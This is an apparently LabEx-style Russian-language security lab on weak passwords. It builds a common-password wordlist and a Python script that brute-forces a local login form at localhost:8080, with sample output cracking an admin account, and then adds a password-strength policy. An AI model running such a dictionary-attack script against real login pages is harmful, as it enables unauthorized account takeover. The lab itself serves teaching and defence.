В этом лабораторном занятии вы будете выполнять роль исследователя по безопасности, которому поручено проверить безопасность паролей веб-приложения. Вы исследуете уязвимости, связанные с использованием слабых паролей, и научитесь методам их взлома. Этот практический опыт даст вам представление о наступательных методах и важности надежных защитных мер в области кибербезопасности.
На этом этапе мы соберем информацию о целевом веб-сайте, что является важной первой фазой любого оценки безопасности.
http://localhost:8080/. Вы можете сделать это, кликнув на вкладку Web 8080 в среде LabEx.
Примечание: В виртуальной машине LabEx веб-сервер работает в временной публичной сети. Это означает, что доменное имя, которое вы видите, может не быть "localhost", а быть реально доступным доменом. Это нормально и не влияет на выполнение лабораторного задания.
Тщательно изучите форму входа. Обратите внимание на следующее:
Попробуйте войти, используя несколько случайных комбинаций имен пользователей и паролей. Например:
test, Пароль: password123admin, Пароль: adminuser, Пароль: 12345При каждой попытке вы должны получить сообщение "Неверное имя пользователя или пароль".
Это первоначальное разведывание помогает нам понять систему, с которой мы имеем дело, и определить следующие шаги в попытке взломать пароли.
Теперь, когда мы собрали информацию о системе входа, мы создадим словарь потенциальных паролей. Это распространенная техника, используемая при попытках взлома паролей.
passwords.txt:cat << EOF > ~/project/password_lab/passwords.txt
123456
password
qwerty
letmein
admin
welcome
monkey
123456789
1234567890
superman
supersecret123
iloveyou
password123
123123
000000
12345678
sunshine
qwerty123
1q2w3e4r
111111
1234567
starwars
dragon
princess
adobe123
football
ashley
bailey
trustno1
passw0rd
whatever
EOFЭта команда использует технику, называемую "здесь-документом" (here document) в bash. Она позволяет создать файл с несколькими строками текста за одну команду. Вот как это работает:
cat << EOF > filename: Эта команда сообщает системе взять весь текст до тех пор, пока не встретит "EOF" (End Of File - конец файла), и записать его в указанный файл.EOF и вторым EOF - это содержимое, которое будет записано в файл.EOF отмечает конец текста, который нужно записать.После выполнения этой команды вы создадите файл с именем passwords.txt в директории ~/project/password_lab/, содержащий список часто используемых (и, следовательно, слабых) паролей.
В реальной жизни атакующие могут использовать гораздо более крупные словари, часто содержащие миллионы паролей. Они могут включать:
Создание и использование таких словарей для несанкционированного доступа является незаконным и неэтичным. Мы используем этот небольшой словарь только в образовательных целях, чтобы понять, как работают такие атаки и как противостоять им.
Теперь, когда у нас есть словарь паролей, мы создадим Python-скрипт для автоматизации процесса проверки этих паролей на целевом веб-сайте.
Откройте терминал на рабочем столе, если он еще не открыт.
Введите следующую команду, чтобы открыть новый файл с именем password_cracker.py в текстовом редакторе nano:
nano ~/project/password_lab/password_cracker.pyimport requests
import time
def crack_password(username, password_list):
url = 'http://localhost:8080'
for password in password_list:
response = requests.post(url, data={'username': username, 'password': password.strip()})
if 'Login successful!' in response.text:
print(f"Succeeded! {username} with password: {password.strip()}")
else:
print(f"Failed attempt for {username} with password: {password.strip()}")
time.sleep(0.1) ## Small delay to avoid overwhelming the server
def main():
usernames = ['admin', 'user', 'root', 'administrator', 'webmaster']
with open('passwords.txt', 'r') as f:
passwords = f.readlines()
for username in usernames:
print(f"Attempting to crack password for user: {username}")
crack_password(username, passwords)
if __name__ == '__main__':
main()Ctrl+X, затем Y, а затем Enter.Разберем, что делает этот скрипт:
Функция crack_password:
Функция main:
passwords.txt.crack_password с списком паролей.Этот скрипт автоматизирует процесс проверки множества комбинаций имен пользователей и паролей, аналогично тому, как атакующий может пытаться проникнуть в систему. Однако важно отметить, что использование таких методов без разрешения является незаконным и неэтичным. Мы используем этот скрипт только в образовательных целях, чтобы понять, как работают такие атаки и как противостоять им.
Теперь, когда у нас есть скрипт для взлома паролей, мы запустим его и проанализируем результаты.
cd ~/project/password_labpython password_cracker.pylabex:password_lab/ $ python password_cracker.py
Attempting to crack password for user: admin
Failed attempt for admin with password: 123456
Failed attempt for admin with password: password
Failed attempt for admin with password: qwerty
Failed attempt for admin with password: letmein
Failed attempt for admin with password: admin
Failed attempt for admin with password: welcome
Failed attempt for admin with password: monkey
Failed attempt for admin with password: 123456789
Failed attempt for admin with password: 1234567890
Failed attempt for admin with password: superman
Succeeded! admin with password: supersecret123Это упражнение показывает, как легко можно угадать слабые пароли, используя распространенные слова или шаблоны. В данном случае учетная запись "admin" с паролем "supersecret123" оказалась уязвимой для нашей словарной атаки.
Важно понимать, что хотя этот скрипт успешно работал в этом контролируемом окружении, попытка использовать такие методы на реальных системах без явного разрешения является незаконной и неэтичной. Эти знания должны использоваться для понимания уязвимостей и улучшения безопасности, а не для эксплойтации систем.
Теперь, когда мы успешно взломали некоторые пароли, давайте реализуем более строгие политики паролей, чтобы предотвратить такие атаки.
WebIDE в виртуальной машине LabEx. WebIDE - это веб-интегрированная среда разработки, которая позволяет писать, запускать и отлаживать код прямо в браузере. Она похожа на редактор VS Code, но работает в браузере. WebIDE подходит для редактирования более длинных файлов кода.
app.py, чтобы открыть его в редакторе.users для реализации проверки надежности пароля:import re
def is_strong_password(password):
if len(password) < 12:
return False
if not re.search(r'[A-Z]', password):
return False
if not re.search(r'[a-z]', password):
return False
if not re.search(r'\d', password):
return False
if not re.search(r'[!@#$%^&*(),.?":{}|<>]', password):
return False
return True
Эта функция проверяет, что пароль:
if __name__ == '__main__':@app.route('/register', methods=['GET', 'POST'])
def register():
message = ''
if request.method == 'POST':
username = request.form.get('username')
password = request.form.get('password')
if username and password:
if is_strong_password(password):
if username not in users:
users[username] = bcrypt.hashpw(password.encode('utf-8'), bcrypt.gensalt())
message = 'Registration successful!'
else:
message = 'Username already exists'
else:
message = 'Password is not strong enough'
else:
message = 'Username and password are required'
return render_template_string('''
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Secure Registration</title>
<script src="https://cdn.tailwindcss.com"></script>
</head>
<body class="bg-gray-100 h-screen flex items-center justify-center">
<div class="bg-white p-8 rounded-lg shadow-md w-96">
<h2 class="text-2xl font-bold mb-6 text-center text-gray-800">Secure Registration</h2>
<form method="post" class="space-y-4">
<div>
<label for="username" class="block text-sm font-medium text-gray-700">Username</label>
<input type="text" id="username" name="username" required class="mt-1 block w-full px-3 py-2 bg-white border border-gray-300 rounded-md shadow-sm focus:outline-none focus:ring-indigo-500 focus:border-indigo-500">
</div>
<div>
<label for="password" class="block text-sm font-medium text-gray-700">Password</label>
<input type="password" id="password" name="password" required class="mt-1 block w-full px-3 py-2 bg-white border border-gray-300 rounded-md shadow-sm focus:outline-none focus:ring-indigo-500 focus:border-indigo-500">
</div>
<div>
<button type="submit" class="w-full flex justify-center py-2 px-4 border border-transparent rounded-md shadow-sm text-sm font-medium text-white bg-indigo-600 hover:bg-indigo-700 focus:outline-none focus:ring-2 focus:ring-offset-2 focus:ring-indigo-500">
Register
</button>
</div>
</form>
<p class="mt-4 text-center text-sm text-gray-600">{{ message }}</p>
<p class="mt-2 text-center text-xs text-gray-500">Password must be at least 12 characters long and contain uppercase, lowercase, numbers, and special characters.</p>
</div>
</body>
</html>
''', message=message)
Этот код создает новый маршрут для регистрации пользователя. Он проверяет, соответствует ли введенный пароль нашим критериям надежного пароля, прежде чем создать нового пользователя.
pkill -f "python app.py"
python ~/project/password_lab/app.pyWeb 8080 и добавьте /register к URL, чтобы получить доступ к новой форме регистрации:
Попробуйте зарегистрировать новую учетную запись с слабым паролем (например, "password123"). Посмотрите, как приложение применяет новую политику паролей.
Теперь зарегистрируйте новую учетную запись с надежным паролем, который соответствует всем критериям. Например:
labexS3cureP@ssw0rd-2024Этот пароль соответствует всем нашим требованиям: он содержит более 12 символов, заглавные и строчные буквы, цифры и специальные символы.
После успешной регистрации давайте протестируем наш скрипт для взлома паролей на этом новом надежном пароле. Измените скрипт password_cracker.py:
nano ~/project/password_lab/password_cracker.pyusernames = ['admin', 'user', 'root', 'administrator', 'webmaster']usernames = ['labex']Запустите измененный скрипт:
python ~/project/password_lab/password_cracker.pyОбратите внимание, что скрипт не может взломать новый надежный пароль. Это демонстрирует эффективность реализации строгих политик паролей.
В этом лабораторном занятии вы познакомились с процессом этического взлома и тестирования безопасности паролей. Вот краткий обзор того, что вы достигли:
